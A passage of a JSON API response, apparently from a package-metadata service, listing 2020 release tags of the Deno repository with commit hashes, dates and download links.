/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","man